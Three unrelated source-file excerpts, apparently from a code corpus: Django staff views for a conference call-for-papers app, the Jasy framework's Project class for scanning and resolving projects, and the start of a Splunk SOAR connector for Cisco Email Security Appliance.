    return render(request, 'cfp/staff/participant_list.html', {
        'filter_form': filter_form,
        'action_form': action_form,
        'participant_list': participants,
        'show_filters': show_filters,
        'contact_link': contact_link,
        'csv_link': csv_link,
        'pending_email': bool(request.session.get('speaker-email-list', None)),
    })
@staff_required
def participant_details(request, participant_id):
    """Show a participant's profile and let staff post to their conversation."""
    participant = get_object_or_404(Participant, pk=participant_id, site=request.conference.site)
    message_form = MessageForm(request.POST or None)
    if request.method == 'POST' and message_form.is_valid():
        conversation = participant.conversation
        # Thread the new message under the latest one in the conversation
        send_message(
            thread=conversation,
            author=request.user,
            subject='',
            content=message_form.cleaned_data['content'],
            in_reply_to=conversation.message_set.last(),
        )
        messages.success(request, _('Message sent!'))
        return redirect(reverse('participant-details', args=[participant.pk]))
    context = {'participant': participant}
    return render(request, 'cfp/staff/participant_details.html', context)
class ParticipantCreate(StaffRequiredMixin, OnSiteFormMixin, CreateView):
    """Staff creation of a participant profile."""
    model = Participant
    template_name = 'cfp/staff/participant_form.html'

    def get_form_class(self):
        # Limit the form to the editable fields plus the social-network ones
        return modelform_factory(
            self.model,
            form=ParticipantForm,
            fields=['name', 'vip', 'email', 'phone_number', 'biography', 'notes'] + ParticipantForm.SOCIAL_FIELDS,
        )
class ParticipantUpdate(StaffRequiredMixin, OnSiteFormMixin, UpdateView):
    """Staff edition of a participant profile, looked up by primary key."""
    model = Participant
    template_name = 'cfp/staff/participant_form.html'
    slug_field = 'pk'
    slug_url_kwarg = 'participant_id'

    def get_form_class(self):
        # Same field set as ParticipantCreate
        return modelform_factory(
            self.model,
            form=ParticipantForm,
            fields=['name', 'vip', 'email', 'phone_number', 'biography', 'notes'] + ParticipantForm.SOCIAL_FIELDS,
        )
class ParticipantRemove(StaffRequiredMixin, OnSiteFormMixin, DeleteView):
    """Staff deletion of a participant; only those without any talk are deletable."""
    slug_field = 'pk'
    slug_url_kwarg = 'participant_id'
    success_url = reverse_lazy('participant-list')

    def get_queryset(self):
        # NOTE(review): unlike sibling views this queryset is not filtered by
        # the current site — confirm cross-site deletion is prevented elsewhere.
        return Participant.objects.filter(talk__isnull=True)
@staff_required
def participant_add_talk(request, participant_id):
    """Let staff create a new talk proposal on behalf of a participant."""
    participant = get_object_or_404(Participant, site=request.conference.site, pk=participant_id)
    categories = TalkCategory.objects.filter(site=request.conference.site)
    form = TalkForm(request.POST or None, categories=categories)
    if request.method == 'POST' and form.is_valid():
        # Attach the talk to the current site before the first save, then
        # link the speaker (the M2M needs a saved instance).
        talk = form.save(commit=False)
        talk.site = request.conference.site
        talk.save()
        talk.speakers.add(participant)
        return redirect(reverse('talk-details', kwargs={'talk_id': talk.pk}))
    return render(request, 'cfp/staff/talk_form.html', {
        'participant': participant,
        'form': form,
    })
@staff_required
def speaker_email(request):
    """Compose and send a bulk email to pre-selected speakers.

    The selection is stored in the session by the participant-list action
    form. A first valid POST shows a confirmation step; only a POST with
    'confirm' checked actually sends the mails.
    """
    speakers = Participant.objects.filter(pk__in=request.session.get('speaker-email-list', []))
    if not speakers.exists():
        messages.error(request, _('Please select some speakers.'))
        return redirect('participant-list')
    form = SendSpeakerMailForm(request.POST or None, initial=request.session.get('speaker-email-stored'), speakers=speakers)
    if request.method == 'POST' and form.is_valid():
        subject = form.cleaned_data['subject']
        body = form.cleaned_data['body']
        # Keep the draft in the session so it survives the confirmation round-trip
        request.session['speaker-email-stored'] = {'subject': subject, 'body': body}
        if form.cleaned_data['confirm']:
            sent = speaker_email_send(speakers, subject, body)
            messages.success(request, _('%(count)d mails have been sent.') % {'count': sent})
            del request.session['speaker-email-list']
            return redirect('participant-list')
        else:
            messages.info(request, _("You're ready to send %(count)d emails.") % {'count': speakers.count()})
    else:
        # First display: hide the confirmation checkbox until the draft validates
        form.fields.pop('confirm')
    return render(request, 'cfp/staff/speaker_email.html', {
        'speakers': speakers,
        'form': form,
    })
@require_http_methods(['POST'])
@staff_required
def speaker_email_preview(request):
    """Render the preview of a bulk speaker email for one speaker."""
    form = PreviewSpeakerMailForm(request.POST or None)
    if not form.is_valid():
        return HttpResponseServerError()
    data = form.cleaned_data
    speaker = get_object_or_404(Participant, site=request.conference.site, pk=data['speaker'])
    return HttpResponse(speaker_email_render_preview(speaker, data['subject'], data['body']))
@staff_required
def conference_edit(request):
    """Admin page to edit the conference settings.

    When new staff members are added through the form, each one receives a
    notification email with login and password-reset links.
    """
    form = ConferenceForm(request.POST or None, instance=request.conference)
    if request.method == 'POST' and form.is_valid():
        # Diff the staff set around the save to find newly added members
        old_staff = set(request.conference.staff.all())
        new_conference = form.save()
        new_staff = set(new_conference.staff.all())
        added_staff = new_staff - old_staff
        protocol = 'https' if request.is_secure() else 'http'
        base_url = protocol+'://'+request.conference.site.domain
        url_login = base_url + reverse('login')
        url_password_reset = base_url + reverse('password_reset')
        msg_title = _('[{}] You have been added to the staff team').format(request.conference.name)
        msg_body_template = _("""Hi {},
You have been added to the staff team.
You can now:
- login: {}
- reset your password: {}
{}
""")
        # TODO: send bulk emails
        for user in added_staff:
            msg_body = msg_body_template.format(user.get_full_name(), url_login, url_password_reset, request.conference.name)
            send_mail(
                msg_title,
                msg_body,
                request.conference.from_email(),
                [user.email],
                fail_silently=False,
            )
        messages.success(request, _('Modifications successfully saved.'))
        return redirect(reverse('conference-edit'))
    return render(request, 'cfp/admin/conference.html', {
        'form': form,
    })
@staff_required
def homepage_edit(request):
    """Display and process the homepage edition form for staff members."""
    form = HomepageForm(request.POST or None, instance=request.conference)
    submitted = request.method == 'POST'
    if submitted and form.is_valid():
        form.save()
        messages.success(request, _('Modifications successfully saved.'))
        return redirect(reverse('homepage-edit'))
    context = {'form': form}
    return render(request, 'cfp/admin/homepage.html', context)
class TalkUpdate(StaffRequiredMixin, OnSiteMixin, OnSiteFormMixin, UpdateView):
    """Staff edition of a talk, using the site-specific talk/speaker form."""
    model = Talk
    template_name = 'cfp/staff/talk_form.html'
    pk_url_kwarg = 'talk_id'

    def get_form_class(self):
        # The form class depends on the talk's site (categories, tracks, ...)
        return get_talk_speaker_form_class(self.object.site)
class TrackMixin(OnSiteMixin):
    """Shared base for track views; site scoping comes from OnSiteMixin."""
    model = Track
class TrackList(StaffRequiredMixin, TrackMixin, ListView):
    """Staff listing of the conference tracks."""
    template_name = 'cfp/staff/track_list.html'
class TrackFormMixin(OnSiteFormMixin, TrackMixin):
    """Common form settings shared by track create/update views."""
    template_name = 'cfp/staff/track_form.html'
    form_class = TrackForm
    success_url = reverse_lazy('track-list')
class TrackCreate(StaffRequiredMixin, TrackFormMixin, CreateView):
    """Staff creation of a track."""
    pass
class TrackUpdate(StaffRequiredMixin, TrackFormMixin, UpdateView):
    """Staff edition of a track."""
    pass
class RoomMixin(OnSiteMixin):
    """Shared base for room views; site scoping comes from OnSiteMixin."""
    model = Room
class RoomList(StaffRequiredMixin, RoomMixin, ListView):
    """Staff listing of the conference rooms."""
    template_name = 'cfp/staff/room_list.html'
class RoomDetail(StaffRequiredMixin, RoomMixin, DetailView):
    """Staff detail page for a single room."""
    template_name = 'cfp/staff/room_details.html'
class RoomFormMixin(RoomMixin):
    """Common form settings shared by room create/update views."""
    template_name = 'cfp/staff/room_form.html'
    form_class = RoomForm
    success_url = reverse_lazy('room-list')

    def get_form_kwargs(self):
        # Hand the current conference to the form for site-specific choices
        kwargs = super().get_form_kwargs()
        kwargs.update({
            'conference': self.request.conference,
        })
        return kwargs
class RoomCreate(StaffRequiredMixin, RoomFormMixin, CreateView):
    """Staff creation of a room."""
    pass
class RoomUpdate(StaffRequiredMixin, RoomFormMixin, UpdateView):
    """Staff edition of a room."""
    pass
class TalkCategoryMixin(OnSiteMixin):
    """Shared base for talk-category views; site scoping via OnSiteMixin."""
    model = TalkCategory
class TalkCategoryList(StaffRequiredMixin, TalkCategoryMixin, ListView):
    """Admin listing of the talk categories."""
    template_name = 'cfp/admin/category_list.html'
class TalkCategoryFormMixin(TalkCategoryMixin):
    """Common form settings shared by category create/update views."""
    template_name = 'cfp/admin/category_form.html'
    form_class = TalkCategoryForm
    success_url = reverse_lazy('category-list')

    def get_form_kwargs(self):
        # Hand the current conference to the form for site-specific choices
        kwargs = super().get_form_kwargs()
        kwargs.update({
            'conference': self.request.conference,
        })
        return kwargs
class TalkCategoryCreate(StaffRequiredMixin, TalkCategoryFormMixin, CreateView):
    """Admin creation of a talk category."""
    pass
class TalkCategoryUpdate(StaffRequiredMixin, TalkCategoryFormMixin, UpdateView):
    """Admin edition of a talk category."""
    pass
class TagMixin(OnSiteMixin):
    """Shared base for tag views; site scoping comes from OnSiteMixin."""
    model = Tag
class TagList(StaffRequiredMixin, TagMixin, ListView):
    """Admin listing of the talk tags."""
    template_name = 'cfp/admin/tag_list.html'
class TagFormMixin(TagMixin):
    """Common form settings shared by tag create/update views."""
    template_name = 'cfp/admin/tag_form.html'
    form_class = TagForm
    success_url = reverse_lazy('tag-list')

    def get_form_kwargs(self):
        # Hand the current conference to the form for site-specific choices
        kwargs = super().get_form_kwargs()
        kwargs.update({
            'conference': self.request.conference,
        })
        return kwargs
class TagCreate(StaffRequiredMixin, TagFormMixin, CreateView):
    """Admin creation of a tag."""
    pass
class TagUpdate(StaffRequiredMixin, TagFormMixin, UpdateView):
    """Admin edition of a tag."""
    pass
class ActivityMixin(OnSiteMixin):
    """Shared base for activity views; site scoping comes from OnSiteMixin."""
    model = Activity
class ActivityList(StaffRequiredMixin, ActivityMixin, ListView):
    """Admin listing of the activities."""
    template_name = 'cfp/admin/activity_list.html'
class ActivityFormMixin(ActivityMixin):
    """Common form settings shared by activity create/update views."""
    template_name = 'cfp/admin/activity_form.html'
    form_class = ActivityForm
    success_url = reverse_lazy('activity-list')

    def get_form_kwargs(self):
        # Hand the current conference to the form for site-specific choices
        kwargs = super().get_form_kwargs()
        kwargs.update({
            'conference': self.request.conference,
        })
        return kwargs
class ActivityCreate(StaffRequiredMixin, ActivityFormMixin, CreateView):
    """Admin creation of an activity."""
    pass
class ActivityUpdate(StaffRequiredMixin, ActivityFormMixin, UpdateView):
    """Admin edition of an activity."""
    pass
@staff_required
def create_user(request):
    """Admin page allowing staff to create a new user account."""
    form = CreateUserForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        form.save()
        messages.success(request, _('User created successfully.'))
        return redirect(reverse('create-user'))
    context = {'form': form}
    return render(request, 'cfp/admin/create_user.html', context)
def schedule(request, program_format, pending, template, staff, cache=None):
    """Render the conference program in the requested format.

    :param program_format: None for the full HTML page, or one of 'html',
        'xml', 'ics', 'citymeo' for raw exports.
    :param pending: include talks whose acceptation is still pending
    :param staff: render with staff-only details
    :param cache: passed through to Program (None = default behaviour)
    :raises Http404: when the requested format is unknown
    """
    program = Program(site=request.conference.site, pending=pending, staff=staff, cache=cache)
    if program_format is None:
        return render(request, template, {'program': program.render('html')})
    elif program_format == 'html':
        return HttpResponse(program.render('html'))
    elif program_format == 'xml':
        return HttpResponse(program.render('xml'), content_type="application/xml")
    elif program_format in ['ics', 'citymeo']:
        response = HttpResponse(program.render('ics', citymeo=(program_format == 'citymeo')), content_type='text/calendar')
        response['Content-Disposition'] = 'attachment; filename="planning.ics"'
        return response
    else:
        # Interpolate after the gettext call so the message stays translatable
        raise Http404(_("Format '%s' not available") % program_format)
def public_schedule(request, program_format):
    """Public schedule endpoint.

    Staff always have access; everybody else only once the schedule has been
    made available. A configured redirection URL takes precedence for the
    HTML page (but not for raw export formats).
    """
    if not request.conference.schedule_available and not is_staff(request, request.user):
        raise PermissionDenied
    if request.conference.schedule_redirection_url and program_format is None:
        return redirect(request.conference.schedule_redirection_url)
    else:
        return schedule(request, program_format=program_format, pending=False, template='cfp/schedule.html', staff=False)
@staff_required
def staff_schedule(request, program_format):
    """Staff schedule: includes pending talks and bypasses the cache."""
    return schedule(request, program_format=program_format, pending=True, template='cfp/staff/schedule.html', staff=True, cache=False)
@staff_required
def schedule_evict(request):
    """Flush the cache so the schedule is regenerated on next access."""
    # NOTE(review): this clears the entire cache backend, not only the
    # schedule entries — confirm that is intended.
    cache.clear()
    messages.success(request, _('Schedule evicted from cache.'))
    return redirect('/')
class Select2View(StaffRequiredMixin, AutoResponseView):
    """Staff-only endpoint backing the select2 autocomplete widgets."""
    pass
|
<filename>jasy/core/Project.py
#
# Jasy - Web Tooling Framework
# Copyright 2010-2012 Zynga Inc.
#
import os, re
import jasy.core.Cache
import jasy.core.Config as Config
import jasy.core.File as File
import jasy.core.Console as Console
import jasy.core.Util as Util
import jasy.vcs.Repository as Repository
import jasy.item.Abstract
import jasy.item.Doc
import jasy.item.Translation
import jasy.item.Class
import jasy.item.Asset
from jasy import UserError
__all__ = ["Project", "getProjectFromPath", "getProjectDependencies"]
classExtensions = (".js")
# Gettext .po files + ICU formats (http://userguide.icu-project.org/locale/localizing) (all formats but without .java support)
translationExtensions = (".po", ".xlf", ".properties", ".txt")
docFiles = ("package.md", "readme.md")
repositoryFolder = re.compile(r"^([a-zA-Z0-9\.\ _-]+)-([a-f0-9]{40})$")
projects = {}
def getProjectFromPath(path, config=None, version=None):
    """Return the (cached) Project instance for *path*, creating it on first use."""

    global projects

    project = projects.get(path)
    if project is None:
        project = Project(path, config, version)
        projects[path] = project

    return project
def getProjectDependencies(project, checkoutDirectory="external", updateRepositories=True):
    """ Returns a sorted list of projects depending on the given project (including the given one) """

    # Depth-first walk over the requirement graph; `names`/`result` (defined
    # below) accumulate visited projects and guard against duplicates.
    def __resolve(project):

        name = project.getName()

        # List of required projects
        Console.info("Getting requirements of %s...", Console.colorize(name, "bold"))
        Console.indent()
        requires = project.getRequires(checkoutDirectory, updateRepositories)
        Console.outdent()

        if not requires:
            return

        Console.debug("Processing %s requirements...", len(requires))
        Console.indent()

        # Adding all project in reverse order.
        # Adding all local ones first before going down to their requirements

        for requiredProject in reversed(requires):
            requiredName = requiredProject.getName()
            if not requiredName in names:
                Console.debug("Adding: %s %s (via %s)", requiredName, requiredProject.version, project.getName())
                names[requiredName] = True
                result.append(requiredProject)
            else:
                Console.debug("Blocking: %s %s (via %s)", requiredName, requiredProject.version, project.getName())

        # Process all requirements of added projects
        for requiredProject in requires:
            if requiredProject.hasRequires():
                __resolve(requiredProject)

        Console.outdent()

    # Seed with the root project itself
    result = [project]
    names = {
        project.getName() : True
    }

    __resolve(project)

    return result
def getProjectNameFromPath(path):
    """Derive a project name from the last component of *path*.

    Strips a trailing ``-<sha1>`` clone suffix (as produced by git checkouts)
    and then any other trailing ``-<something>`` marker from the folder name.
    """

    folder = os.path.basename(path)

    # Folders cloned via git etc. carry a 40 character SHA1 postfix
    shaMatch = re.match(r"^([a-zA-Z0-9\.\ _-]+)-([a-f0-9]{40})$", folder)
    if shaMatch is not None:
        folder = shaMatch.group(1)

    # A dash often separates optional data from the real name
    dashPos = folder.rfind("-")
    if dashPos != -1:
        folder = folder[:dashPos]

    return folder
class Project():
    """Represents a single Jasy project on disk.

    A project is a directory containing a "jasyproject" configuration plus a
    set of classes, assets, docs and translations which are lazily indexed
    on first access (see scan()).
    """

    # Project layout kind: "none", "manual", "application" or "resource"
    kind = "none"

    # Whether the file system has been indexed yet (lazy, see scan())
    scanned = False

    def __init__(self, path, config=None, version=None):
        """
        Constructor call of the project.

        - First param is the path of the project relative to the current working directory.
        - Config can be read from jasyproject.json or using constructor parameter @config
        - Parent is used for structural debug messages (dependency trees)
        """

        if not os.path.isdir(path):
            raise UserError("Invalid project path: %s" % path)

        # Only store and work with full path
        self.__path = os.path.abspath(os.path.expanduser(path))

        # Store given params
        self.version = version

        # Initialize item registries (fileId => item instance)
        self.classes = {}
        self.assets = {}
        self.docs = {}
        self.translations = {}

        # Load project configuration
        self.__config = Config.Config(config)
        self.__config.loadValues(os.path.join(self.__path, "jasyproject"), optional=True)

        # Initialize cache
        try:
            File.mkdir(os.path.join(self.__path, ".jasy"))
            self.__cache = jasy.core.Cache.Cache(self.__path, filename=".jasy/cache")
        except IOError as err:
            raise UserError("Could not initialize project. Cache file in %s could not be initialized! %s" % (self.__path, err))

        # Detect version changes
        if version is None:
            self.__modified = True
        else:
            cachedVersion = self.__cache.read("project[version]")
            self.__modified = cachedVersion != version
            self.__cache.store("project[version]", version)

        # Read name from manifest or use the basename of the project's path
        self.__name = self.__config.get("name", getProjectNameFromPath(self.__path))

        # Read requires
        self.__requires = self.__config.get("requires", {})

        # Defined whenever no package is defined and classes/assets are not stored in the toplevel structure.
        self.__package = self.__config.get("package", self.__name if self.__config.has("name") else None)

        # Read fields (for injecting data into the project and build permutations)
        self.__fields = self.__config.get("fields", {})

        # Read setup for running command pre-scan
        self.__setup = self.__config.get("setup")

    #
    # Project Scan/Init
    #

    def scan(self):
        """Index the project's file system content (idempotent)."""

        if self.scanned:
            return

        updatemsg = "[updated]" if self.__modified else "[cached]"
        Console.info("Scanning project %s %s...", self.__name, Console.colorize(updatemsg, "grey"))
        Console.indent()

        # Support for pre-initialize projects...
        setup = self.__setup
        if setup and self.__modified:
            Console.info("Running setup...")
            Console.indent()

            for cmd in setup:
                Console.info("Executing %s...", cmd)

                result = None
                try:
                    result = Util.executeCommand(cmd, "Failed to execute setup command %s" % cmd, path=self.__path)
                except Exception as ex:
                    if result:
                        Console.error(result)

                    raise UserError("Could not scan project %s: %s" % (self.__name, ex))

            Console.outdent()

        # Processing custom content section. Only supports classes and assets.
        if self.__config.has("content"):
            self.kind = "manual"
            self.__addContent(self.__config.get("content"))

        # Application projects
        elif self.__hasDir("source"):
            self.kind = "application"

            if self.__hasDir("source/class"):
                self.__addDir("source/class", "classes")
            if self.__hasDir("source/asset"):
                self.__addDir("source/asset", "assets")
            if self.__hasDir("source/translation"):
                self.__addDir("source/translation", "translations")

        # Compat - please change to class/style/asset instead
        elif self.__hasDir("src"):
            self.kind = "resource"
            self.__addDir("src", "classes")

        # Resource projects
        else:
            self.kind = "resource"

            if self.__hasDir("class"):
                self.__addDir("class", "classes")
            if self.__hasDir("asset"):
                self.__addDir("asset", "assets")
            if self.__hasDir("translation"):
                self.__addDir("translation", "translations")

        # Generate summary
        summary = []
        for section in ["classes", "assets", "translations"]:
            content = getattr(self, section, None)
            if content:
                summary.append("%s %s" % (len(content), section))

        # Print out
        if summary:
            Console.info("Done %s: %s" % (Console.colorize("[%s]" % self.kind, "grey"), Console.colorize(", ".join(summary), "green")))
        else:
            Console.error("Project is empty!")

        self.scanned = True

        Console.outdent()

    #
    # FILE SYSTEM INDEXER
    #

    def __hasDir(self, directory):
        """Whether *directory* (relative to the project root) exists and is a directory."""
        full = os.path.join(self.__path, directory)
        if os.path.exists(full):
            if not os.path.isdir(full):
                # Fixed: the original passed a single value to a two-placeholder
                # format string, which raised TypeError instead of UserError.
                raise UserError("Expecting %s to be a directory: %s" % (directory, full))

            return True

        return False

    def __addContent(self, content):
        """Register manually configured content (mapping of fileId => file path list)."""
        Console.debug("Adding manual content")

        Console.indent()
        for fileId in content:
            fileContent = content[fileId]
            if len(fileContent) == 0:
                raise UserError("Empty content!")

            # If the user defines a file extension for JS public idenfiers
            # (which is not required) we filter them out
            if fileId.endswith(".js"):
                raise UserError("JavaScript files should define the exported name, not a file name: %s" % fileId)

            fileExtension = os.path.splitext(fileContent[0])[1]

            # Support for joining text content
            if len(fileContent) == 1:
                filePath = os.path.join(self.__path, fileContent[0])
            else:
                filePath = [os.path.join(self.__path, filePart) for filePart in fileContent]

            # Structure files
            if fileExtension in classExtensions:
                construct = jasy.item.Class.ClassItem
                dist = self.classes
            elif fileExtension in translationExtensions:
                construct = jasy.item.Translation.TranslationItem
                dist = self.translations
            else:
                construct = jasy.item.Asset.AssetItem
                dist = self.assets

            # Check for duplication
            if fileId in dist:
                raise UserError("Item ID was registered before: %s" % fileId)

            # Create instance
            item = construct(self, fileId).attach(filePath)
            Console.debug("Registering %s %s" % (item.kind, fileId))
            dist[fileId] = item

        Console.outdent()

    def __addDir(self, directory, distname):
        """Walk *directory* and register every contained file under *distname*."""

        Console.debug("Scanning directory: %s" % directory)
        Console.indent()

        path = os.path.join(self.__path, directory)
        if not os.path.exists(path):
            return

        for dirPath, dirNames, fileNames in os.walk(path):
            # Fixed: iterate over a snapshot — removing from dirNames while
            # iterating it skipped the entry following each removed one, and a
            # dotted sub project would have been removed twice (ValueError).
            for dirName in list(dirNames):
                # Filter dotted directories like .git, .bzr, .hg, .svn, etc.
                if dirName.startswith("."):
                    dirNames.remove(dirName)

                # Filter sub projects
                elif os.path.exists(os.path.join(dirPath, dirName, "jasyproject.json")):
                    dirNames.remove(dirName)

            relDirPath = os.path.relpath(dirPath, path)

            for fileName in fileNames:

                if fileName[0] == ".":
                    continue

                relPath = os.path.normpath(os.path.join(relDirPath, fileName)).replace(os.sep, "/")
                fullPath = os.path.join(dirPath, fileName)

                self.addFile(relPath, fullPath, distname)

        Console.outdent()

    def addFile(self, relPath, fullPath, distname, override=False):
        """Register a single file in the registry selected by *distname*.

        :param relPath: path relative to the scanned directory (unix style)
        :param fullPath: absolute path on disk
        :param distname: target registry name ("classes", "assets", ...)
        :param override: silently replace an already registered item ID
        """

        fileName = os.path.basename(relPath)
        fileExtension = os.path.splitext(fileName)[1]

        # Prepend package
        if self.__package:
            fileId = "%s/" % self.__package
        else:
            fileId = ""

        # Structure files
        if fileExtension in classExtensions and distname == "classes":
            fileId += os.path.splitext(relPath)[0]
            construct = jasy.item.Class.ClassItem
            dist = self.classes
        elif fileExtension in translationExtensions and distname == "translations":
            fileId += os.path.splitext(relPath)[0]
            construct = jasy.item.Translation.TranslationItem
            dist = self.translations
        elif fileName in docFiles:
            fileId += os.path.dirname(relPath)
            fileId = fileId.strip("/") # edge case when top level directory
            construct = jasy.item.Doc.DocItem
            dist = self.docs
        else:
            fileId += relPath
            construct = jasy.item.Asset.AssetItem
            dist = self.assets

        # Only assets keep unix style paths identifiers
        if construct != jasy.item.Asset.AssetItem:
            fileId = fileId.replace("/", ".")

        # Check for duplication
        if fileId in dist and not override:
            raise UserError("Item ID was registered before: %s" % fileId)

        # Create instance
        item = construct(self, fileId).attach(fullPath)
        Console.debug("Registering %s %s" % (item.kind, fileId))
        dist[fileId] = item

    #
    # ESSENTIALS
    #

    def hasRequires(self):
        """Whether the project declares any requirements."""
        return len(self.__requires) > 0

    def getRequires(self, checkoutDirectory="external", updateRepositories=True):
        """
        Return the project requirements as project instances
        """

        global projects

        result = []

        for entry in self.__requires:

            if type(entry) is dict:
                source = entry["source"]
                config = Util.getKey(entry, "config")
                version = Util.getKey(entry, "version")
                kind = Util.getKey(entry, "kind")
            else:
                source = entry
                config = None
                version = None
                kind = None

            # Versions are expected being string type
            if version is not None:
                version = str(version)

            revision = None

            if Repository.isUrl(source):
                kind = kind or Repository.getType(source)
                path = os.path.abspath(os.path.join(checkoutDirectory, Repository.getTargetFolder(source, version)))

                # Only clone and update when the folder is unique in this session
                # This reduces git/hg/svn calls which are typically quite expensive
                if path not in projects:
                    revision = Repository.update(source, version, path, updateRepositories)
                    if revision is None:
                        raise UserError("Could not update repository %s" % source)

            else:
                kind = "local"
                if not source.startswith(("/", "~")):
                    path = os.path.join(self.__path, source)
                else:
                    path = os.path.abspath(os.path.expanduser(source))

            if path in projects:
                project = projects[path]
            else:
                fullversion = []

                # Produce user readable version when non is defined
                if version is None and revision is not None:
                    version = "master"

                if version is not None:
                    if "/" in version:
                        fullversion.append(version[version.rindex("/")+1:])
                    else:
                        fullversion.append(version)

                if revision is not None:
                    # Shorten typical long revisions as used by e.g. Git
                    if type(revision) is str and len(revision) > 20:
                        fullversion.append(revision[:10])
                    else:
                        fullversion.append(revision)

                if fullversion:
                    fullversion = "-".join(fullversion)
                else:
                    fullversion = None

                project = Project(path, config, fullversion)
                projects[path] = project

            result.append(project)

        return result

    def getFields(self):
        """ Return the project defined fields which may be configured by the build script """
        return self.__fields

    def getClassByName(self, className):
        """ Finds a class by its name."""

        try:
            return self.getClasses()[className]
        except KeyError:
            return None

    def getName(self):
        """Return the project name (from the manifest or derived from the path)."""
        return self.__name

    def getPath(self):
        """Return the absolute project path."""
        return self.__path

    def getPackage(self):
        """Return the package prefix (or None) prepended to generated item IDs."""
        return self.__package

    def getConfigValue(self, key, default=None):
        """Return a raw value from the project configuration."""
        return self.__config.get(key, default)

    def toRelativeUrl(self, path, prefix="", subpath="source"):
        """Convert the absolute *path* into a unix style URL relative to *subpath*."""

        root = os.path.join(self.__path, subpath)
        relpath = os.path.relpath(path, root)

        if prefix:
            if not prefix[-1] == os.sep:
                prefix += os.sep

            relpath = os.path.normpath(prefix + relpath)

        return relpath.replace(os.sep, "/")

    #
    # CACHE API
    #

    def getCache(self):
        """Returns the cache instance"""

        return self.__cache

    def clean(self):
        """Clears the cache of the project"""

        Console.info("Clearing cache of %s..." % self.__name)
        self.__cache.clear()

    def close(self):
        """Closes the project which deletes the internal caches"""

        if self.__cache:
            self.__cache.close()
            self.__cache = None

        self.classes = None
        self.assets = None
        self.docs = None
        self.translations = None

    def pause(self):
        """Pauses the project so that other processes could modify/access it"""

        self.__cache.close()

    def resume(self):
        """Resumes the paused project"""

        self.__cache.open()

    #
    # LIST ACCESSORS
    #

    def getDocs(self):
        """Returns all package docs"""

        if not self.scanned:
            self.scan()

        return self.docs

    def getClasses(self):
        """ Returns all project JavaScript classes. Requires all files to have a "js" extension. """

        if not self.scanned:
            self.scan()

        return self.classes

    def getAssets(self):
        """ Returns all project asssets (images, stylesheets, static data, etc.). """

        if not self.scanned:
            self.scan()

        return self.assets

    def getTranslations(self):
        """ Returns all translation objects """

        if not self.scanned:
            self.scan()

        return self.translations
|
<reponame>splunk-soar-connectors/ciscoesa<gh_stars>0
# File: ciscoesa_connector.py
#
# Copyright (c) 2017-2022 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
#
# Standard library imports
import base64
import datetime
import json
import re
import socket
import urllib
# Phantom imports
import phantom.app as phantom
import requests
from phantom.action_result import ActionResult
from phantom.base_connector import BaseConnector
# Local imports
import ciscoesa_consts as consts
# Dictionary that maps each error code with its corresponding message
ERROR_RESPONSE_DICT = {
    consts.CISCOESA_REST_RESP_BAD_REQUEST: consts.CISCOESA_REST_RESP_BAD_REQUEST_MSG,
    consts.CISCOESA_REST_RESP_UNAUTHORIZED: consts.CISCOESA_REST_RESP_UNAUTHORIZED_MSG,
    consts.CISCOESA_REST_RESP_FORBIDDEN: consts.CISCOESA_REST_RESP_FORBIDDEN_MSG,
    consts.CISCOESA_REST_RESP_NOT_FOUND: consts.CISCOESA_REST_RESP_NOT_FOUND_MSG,
    consts.CISCOESA_REST_RESP_INTERNAL_SERVER_ERROR: consts.CISCOESA_REST_RESP_INTERNAL_SERVER_ERROR_MSG,
    consts.CISCOESA_REST_RESP_NOT_ACCEPTABLE: consts.CISCOESA_REST_RESP_NOT_ACCEPTABLE_MSG,
    consts.CISCOESA_REST_RESP_ENTITY_TOO_LARGE: consts.CISCOESA_REST_RESP_ENTITY_TOO_LARGE_MSG,
    consts.CISCOESA_REST_RESP_URI_TOO_LONG: consts.CISCOESA_REST_RESP_URI_TOO_LONG_MSG,
    consts.CISCOESA_REST_RESP_NOT_IMPLEMENTED: consts.CISCOESA_REST_RESP_NOT_IMPLEMENTED_MSG,
    consts.CISCOESA_REST_RESP_BAD_GATEWAY: consts.CISCOESA_REST_RESP_BAD_GATEWAY_MSG
}
# Object that maps a report title to the report name used by the API
# key: report title
# value: report name (endpoint fragment)
REPORT_TITLE_TO_NAME_AND_FILTER_MAPPING = {
    consts.CISCOESA_MAIL_USER_DETAILS_REPORT_TITLE: consts.CISCOESA_MAIL_USER_DETAILS_REPORT_NAME,
    consts.CISCOESA_MAIL_INCOMING_DOMAIN_DETAILS_REPORT_TITLE: consts.CISCOESA_MAIL_INCOMING_DOMAIN_DETAILS_REPORT_NAME,
    consts.CISCOESA_MAIL_INCOMING_IP_HOSTNAME_DETAILS_REPORT_TITLE:
        consts.CISCOESA_MAIL_INCOMING_IP_HOSTNAME_DETAILS_REPORT_NAME,
    consts.CISCOESA_MAIL_INCOMING_NETWORK_OWNER_DETAILS_REPORT_TITLE:
        consts.CISCOESA_MAIL_INCOMING_NETWORK_OWNER_DETAILS_REPORT_NAME,
    consts.CISCOESA_OUTGOING_SENDERS_DOMAIN_DETAILS_REPORT_TITLE:
        consts.CISCOESA_OUTGOING_SENDERS_DOMAIN_DETAILS_REPORT_NAME,
    consts.CISCOESA_MAIL_OUTGOING_SENDERS_IP_HOSTNAME_DETAILS_REPORT_TITLE:
        consts.CISCOESA_MAIL_OUTGOING_SENDERS_IP_HOSTNAME_DETAILS_REPORT_NAME,
    consts.CISCOESA_OUTGOING_CONTENT_FILTERS_REPORT_TITLE: consts.CISCOESA_OUTGOING_CONTENT_FILTERS_REPORT_NAME,
    consts.CISCOESA_OUTGOING_DESTINATIONS_REPORT_TITLE: consts.CISCOESA_OUTGOING_DESTINATIONS_REPORT_NAME,
    consts.CISCOESA_VIRUS_TYPES_REPORT_TITLE: consts.CISCOESA_VIRUS_TYPES_REPORT_NAME,
    consts.CISCOESA_INBOUND_SMTP_AUTH_REPORT_TITLE: consts.CISCOESA_INBOUND_SMTP_AUTH_REPORT_NAME,
    consts.CISCOESA_DLP_OUTGOING_POLICY_REPORT_TITLE: consts.CISCOESA_DLP_OUTGOING_POLICY_REPORT_NAME
}
def _is_ip(ip_address):
    """ Function that validates IP address (IPv4 or IPv6).

    :param ip_address: IP address to verify
    :return: True or False
    """
